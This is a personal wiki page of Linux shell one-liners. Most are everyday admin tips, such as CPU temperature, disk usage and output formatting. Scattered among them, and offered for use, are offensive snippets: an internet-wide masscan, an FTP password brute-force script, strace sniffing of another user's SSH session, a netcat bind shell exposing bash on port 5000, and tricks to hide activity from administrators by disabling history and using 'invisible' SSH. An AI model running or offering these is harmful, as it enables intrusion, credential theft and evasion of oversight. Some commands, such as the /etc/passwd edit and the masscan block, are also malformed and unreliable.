Skip to content

Index

# myBestOneLiners

And some other tips and tricks..


Do you know a better or more efficient way to perform any of my oneliners, I would like to know how this can be done, I love learning new ways and doing it effectively and I love linux. If you see something that is wrong or "negative", I also want to know, feel free to explain why as clearly as possible AND I want to know how to do it in the right "way". Pipefalls there is so much of, I want to do it the "right" way and get deeper into the "POSIX" way to do things, contribute pleaase 🐧

If you can not then I hope I contributed to you instead via sharing the knowledge.

You can copy and use my wiki as much as you want as long as you follow GPL v3.0 but IF you want to link or share something from my wiki I would be happy if you make a link to the wiki so more people can find here and the more we is the better we can do this together.


Set default shell for a user

sed -i '1i root:x:0:0:root:/root:/bin/bash' /etc/passwd
sed -i '2d' /etc/passwd

Parse all available icons from freedesktop.org and use them with notify-send

#!/bin/bash
# Author: wuseman <wuseman@nr1.nu>

notifyIcons="https://specifications.freedesktop.org/icon-naming-spec/latest/ar01s04.html"

curl -sL ${notifyIcons} \
  |sed '/</{ :loop s/<[^<]*>//g
    /</{N; b loop }}' \
    |grep -v '^[A-Za-z0-9]' \
    |sed 's/^.* //g;s/^/notify-send -i /;
          s/$/ "New Message/g'|grep '^[a-z]'

Masscan internet on a specifik port

 ( masscan 0.0.0.0/0 \
    -p5555
    --banner \
    --exclude 255.255.255.255 \
    --max-rate 100000|tee targets.txt 2>&1 /dev/null 
 );  1&> /dev/null 

Decode an string with arbitrary precision calculator

echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

Truncate long strings in columns and use custom header names


column -s: -t -n . -N USERNAME,PASS,UID,GID,NAME,HOMEDIR,SHELL \
    -T NAME /etc/passwd|sed "1,2 i $(printf %80s|tr ' ' '=')"

Clone all your repositories you starred

GITUSER=$(whoami); \
    curl "https://api.github.com/users/${GITUSER}/starred?per_page=1000" \
    |grep -o 'git@[^"]*' \
    |parallel -j 25 'git clone {}'

Backup all you starred repos

GITUSER=$(whoami); \
    curl "https://api.github.com/users/${GITUSER}/starred?per_page=1000" \
    |grep -o 'git@[^"]*' \
    |xargs -L1 git clone

Run 10 curl commands in Parallel via xargs

xargs -I% -P10 curl -sL "https://iconfig.co" < <(printf '%s\n' {1..10})

Execute 10 curl commands in parallel via xargs

NUM="10";seq ${NUM}|time xargs -I % -n1 -P${NUM} curl -sL ifconfig.co

head -4 /etc/passwd \
    |tr : , \
    |sed -e 's/^/| /' -e 's/,/,| /g' -e 's/$/,|/' \
    |column -t -s,

paste <(cat /sys/class/thermal/thermal_zone*/type) \
      <(cat /sys/class/thermal/thermal_zone*/temp) \
        |column -s $'\t' -t \
        |sed 's/\(.\)..$/.\1°C/'

123


awk -F": " '/cpu MHz\ */ { print "Processor (or core) running speed is: " $2 }' \
    /proc/cpuinfo ; 

Portscanner via GNU/Parallel

65535 ports scanned in ~3.5s

portscan

seq 65535 | \
        parallel \
        -k \
        --joblog portscan \
        -j9 \
        --pipe \
        --cat \
        -j200% \
        -n9000 \
        --tagstring '\033[30;3{=$_=++$::color%8=}m' \
        'nc -vz localhost $(head -n1 {})-$(tail -n1 {})'

Create a progress bar with GNU/Parallel

seq 1000 |parallel -j30 --bar '(echo {};sleep 0.1)'

bash -c 'exec 3<>/dev/tcp/google.com/80; echo EOF>&3; cat<&3'

cat /sys/devices/cpu/caps/pmu_name

gitUser="wuseman"
curl -s https://api.github.com/users/${gitUser}/repos?per_page=1000 \
    |grep git_url \
    |awk '{print $2}' \
    |sed 's/"\(.*\)",/\1/'

Find dupe files by checking md5sum

find /glftpd/site/archive -type f \
    |grep '([0-9]\{1,9\})\.[^.]\+$' \
    |parallel -n1 -j200% md5sum ::: \
    |awk 'x[$1]++ { print $2 " :::"}' \
    |sed 's/^/Dupe: /g' \
    |sed 's,Dupe,\x1B[31m&\x1B[0m,'

Perform Real-time Process Monitoring Using Watch Utility

watch -n 1 'ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head'

Fast portscanner via GNU/Parallel

parallel -j200% -n1 -a textfile-with-hosts.txt nc -vz {} ::: 22

Fast portscanner via xargs

xargs -i -P 1200 nc -zvn {} 22 < textfile-with-hosts.txt

Check whether laptop is running on battery or cable

  • 1 = on AC
  • 0 = on bat
cat /sys/class/power_supply/AC/online

Block all brute force attacks in realtime (IPv4/SSH)

inotifywait -r -q --format %w /var/log/auth.log \
    |grep -i "Failed pass" \
    |tail -n 1 \
    |grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}';
    iptables -I INPUT -i eth0 -s "$(cat /var/log/auth.log \
        |grep "authentication failure; l" \
        |awk -Frhost= '{print $2}' \
        |tail -n 1)" -j DROP

Watch TCP, UDP open ports in real time with socket summary.

watch ss -stplu

Set user password without passwd

echo 'user:newpassword' | chpasswd

printf "1-minute load average: %.1f%%\n" \ 
    $(bc <<<"$(cut -d ' ' -f 1 /proc/loadavg) * 100")

Import last 2 commands into default editor

fc -1 -2

Check host and port access in pure Bash:

s="$(cat 2>/dev/null < /dev/null > /dev/tcp/${target_ip}/${target_port} \
    & WPID=$!; 
    sleep 3 
    kill $! >/dev/null 2>&1 & KPID=$!; 
    wait $WPID && echo 1)" ; 
    s="${s:-0}"; echo "${s}" | sed 's/0/2/;s/1/0/;s/2/1/'

Network Discover in a one liner

nmap -sn 192.168.1.0/24 -oG - \
    |awk '$4=="Status:" && $5=="Up" {print $0}' \
    |column -t

Print interface that is up and running
 ip addr | awk '/state UP/ {print $2}' | sed 's/.$//'
route|grep -m1 ^default|awk '{print $NF}'

Create a file and manipulate the date

touch -d '-1 year' /tmp/oldfile

Find wich ports you probably want to open in your firewall on a fresh installed machine

lsof -i -nlP \
    |awk '{print $9, $8, $1}' \
    |sed 's/.*://' \
    |sort -u

Execute a command on all commands from previous command

  • Example: touch file{1,2,3}; chmod 777 !*
chmod 777 !*

Produce 10 copies of the same string

echo boo{,,,,,,,,,,}

Show OS release incl version.

grep -m1 -h [0-9] /etc/{*elease,issue} 2>/dev/null | head -1

printf -v _hr "%*s" $(tput cols) && echo ${_hr// /${1--}}

Show used disk space:

df -klP -t xfs -t ext2 -t ext3 -t ext4 -t reiserfs \
    |grep -oE ' [0-9]{1,}( +[0-9]{1,})+' \
    |awk '{sum_used += $2} END {printf "%.0f GB\n", sum_used/1024/1024}'

Show allocated disk space:

df -klP -t xfs -t ext2 -t ext3 -t ext4 -t reiserfs \
    |grep -oE ' [0-9]{1,}( +[0-9]{1,})+' \ 
    |awk '{sum_used += $1} END {printf "%.0f GB\n", sum_used/1024/1024}'

Find all file extension in current dir.

find . -type f  \
    |perl -ne 'print $1 if m/\.([^.\/]+)$/'  \
    |sort -u

Generate a sequence of numbers.

for ((i=1; i<=99; ++i)); do 
    echo $i; 
done

The proper way to read kernel messages in realtime.

dmesg -wx

Monitor cpu in realtime.

watch grep \"cpu MHz\" /proc/cpuinfo

Recall “N”th command from your BASH history without executing it.

!12:p

Get current cpu utilization in percentage

top -bn1 | grep "Cpu(s)" | \
           sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | \
           awk '{print 100 - $1"%"}'

gawk '{print "Temp in degrees Fahrenheit is:",$1/1000 * 1.8 + 32}' \
    /sys/class/thermal/thermal_zone0/temp

Get current cpu utilization in percentage

awk '{u=$2+$4; t=$2+$4+$5; if (NR==1){u1=u; t1=t;} else print ($2+$4-u1) * 100 / (t-t1) "%"; }' \
<(grep 'cpu ' /proc/stat) <(sleep 1;grep 'cpu ' /proc/stat)

Linux get cpu frequency

watch -n.1 "grep \"^[c]pu MHz\" /proc/cpuinfo"

Check temperature of cpu linux

cat /sys/class/thermal/thermal_zone*/temp

Show RPI's Temperature with a command.

cpuTemp0=$(cat /sys/class/thermal/thermal_zone0/temp)
cpuTemp1=$(($cpuTemp0/1000))
cpuTemp2=$(($cpuTemp0/100))
cpuTempM=$(($cpuTemp2 % $cpuTemp1))

gpuTemp0=$(/opt/vc/bin/vcgencmd measure_temp)
gpuTemp0=${gpuTemp0//\'}
gpuTemp0=${gpuTemp0//temp=/}

echo CPU Temp: $cpuTemp1"."$cpuTempM"ºC"
echo GPU Temp: $gpuTemp0

Almost invisible SSH

ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"

Leave bash without History

Tell Bash to use /dev/null instead of ~/.bash_history This is the first command we execute on every shell. It will stop the Bash from logging your commands.

export HISTFILE=/dev/null

Run commmands hidden from admin

/bin/bash -c "exec ls"

Bash Suicide

kill -9  $$
Warning: Program '/bin/bash' crashed.

Shred and Wipe without Shred

FN=textfile.txt;
dd bs=1k count="`du -sk \"${FN}\"|cut -f1`" if=/dev/urandom >"${FN}"; 
rm -f "${FN}"

Sniff a user's SSH session with strace

strace -e trace=read -p <PID> 2>&1 \
        |while read x; do echo "$x" \
        |grep '^read.*= [1-9]$' \
        |cut -f2 -d\"; 
done

Check if a port is open or closed in pure Bash

 ( echo > /dev/tcp/nr1.nu/81; ) &> /dev/null 1>&2 | \
 if [[ $? = "0" ]]; then echo "up"; else echo "down"; fi
  • OR
( : <> /dev/tcp/nr1.nu/81;) \
    &> /dev/null 1>&2 \
    && echo "up" \
    || echo "closed"

Browse to https://www.nr1.nu in pure Bash

exec 5<>/dev/tcp/www.nr1.nu/443
echo -e "GET / HTTP/1.0\n" >&5
cat <&5

Run last command again

!!

Below will open your editor andt paste the last 20 commands you used in cli

fc -1 -20

Bruteforce two ftp accounts at once

#!/bin/bash
# Author: wuseman
# Desc: Bruteforce 2 accounts at once

okMSG() {
    echo -e "[\e[1;32m*\e[0m] $*"
}

errMSG() {
    echo -e "[\e[1;31m*\e[0m] $*"
}

1() {
    curl ftp://host:port -u $line &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line" \
                   || errMSG "Bad password for $line"
}

2() {
    curl ftp://host:port -u $line1 &> /dev/null -u $line1 &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line1" \
                   || errMSG "Bad password for $line1"
}

while 
        read line;read line1; 
        do 
    1;2;sleep 0.1;
done < test

Download files in parallel with GNU/Parallel

time seq 1000|parallel -a 1 -j1000 wget

Fix broken SSH permissions for client

chmod 700 ~/.ssh
chmod 644 ~/.ssh/authorized_keys
chmod 644 ~/.ssh/known_hosts
chmod 644 ~/.ssh/config
chmod 600 ~/.ssh/id_rsa
chmod 644 ~/.ssh/id_rsa.pub
chmod 600 ~/.ssh/github_rsa
chmod 644 ~/.ssh/github_rsa.pub
chmod 600 ~/.ssh/mozilla_rsa
chmod 644 ~/.ssh/mozilla_rsa.pub

If you need to kill a specific process using a given port

fuser -k 445/tcp

Broadcast your shell thru port 5000

bash -i 2>&1 | tee /dev/stderr | nc -l 5000

Generate a random IPv4 adress

printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))"

Generate a random IPv6 adress

for ((i=0;i<8;i++)); do printf "%02x%02x:" $((RANDOM%256)) $((RANDOM%256)); done | sed 's/:$//'  

Generate IP-address ranges using simple bash script

#!/bin/bash
OUTFILE="mk-iprange.txt"
IPRANGE="192.168.0 
192.168.1"
EXCLUDE="192.168.0.1
192.168.0.2
192.168.1.1"

## Remove old OUTFILE
rm -f $OUTFILE

# Loop addresses, write to OUTFILE
for IP in $IPRANGE
do
        seq -f "$IP.%g" 1 255 >> ./$OUTFILE
done

## Exclude IP-addresses from file (inplace replacement)
for EX in $EXCLUDE
do
        sed --in-place "/$EX/d" ./$OUTFILE
done

What is My Tor IP

curl --socks5 localhost:9050 \
     --socks5-hostname localhost:9050 \
     https://check.torproject.org/api/ip

Ports we probably wanna set as accpepted in our iptable chains

lsof -i -nlP|awk '{print $9, $8, $1}'|sed 's/.*://'|sort -u

Create a UEFI Bootable USB

parted /dev/sdc -s print
mkfs.vfat -F 32 /dev/<device>1
mount /dev/<device>1 /<dev_mountpoint>
mount /path/to/iso/Win10_1511_1_<Version>_<Language>_x64.iso /<iso_mountpoint>
cp -R /<iso_mountpoint>/* /<dev_mountpoint>/
printf '%s' "Done" 

grep "cpu " /proc/stat \
    |awk -F ' ' '{total = $2 + $3 + $4 + $5 
} END { print "idle \t used\n" $5*100/total "% " $2*100/total "%"}'

* Create Sample Fiile

printf '%s\n' \
    'These are IPs for related computers' \
    'PC1 IP is: 192.168.0.1' \
    'PC2 IP is: 192.168.1.2' \
    'PC3 IP is: 192.168.10.255' \
    'PC4 IP is: unknown' > ipv4_addresses.txt

Configure efiboomgr

  • You should know how to edit this line otherwise, man efibootmgr
efibootmgr -d /dev/sda -p 2 -c \
    -L "Gentoo Linux" -l /vmlinuz-5.4.97-gentoo-x86_64 \
    -u "cryptdevice=UUID=80bf5e3b-c34f-4917-b7e8-6733909ef5a8:latitude-rootfs \
        root=UUID=80bf5e3b-c34f-4917-b7e8-6733909ef5a8 \
        initrd=/initramfs-5.4.97-gentoo-x86_64.img rw"

flashing_text () { 
  wuzi='*w*u*s*e*m*a*n*_*p*w*n*z \e[00;34m !';
  for i in {0..59}; do
      echo -ne "\r${wuzi:0:$i}" ;sleep 0.05;
done 
};

#!/bin/bash
cat /etc/os-release \
    |head -n 1 \
    |cut -d'=' -f2  \
    |sed 's/"//g' \
    |awk '{print tolower($0)}'
cat /etc/issue|head -n +1|awk '{print $1}'
tr -s ' \011' '\012' < /etc/issue|head -n 1
cat /etc/issue|head -n +|awk '{print $1}'
cat /etc/os-release \
    |grep "PRETTY_NAME" \
    |sed 's/PRETTY_NAME=//g' \
    |sed 's/["]//g' \
    |awk '{print $1}'
awk -F'"' '/NAME/ {print tolower($2)} /NR=2/' /etc/os-release \
    |head -n 1

  • Comments are closed on this article!

Last update: December 4, 2022 19:31:07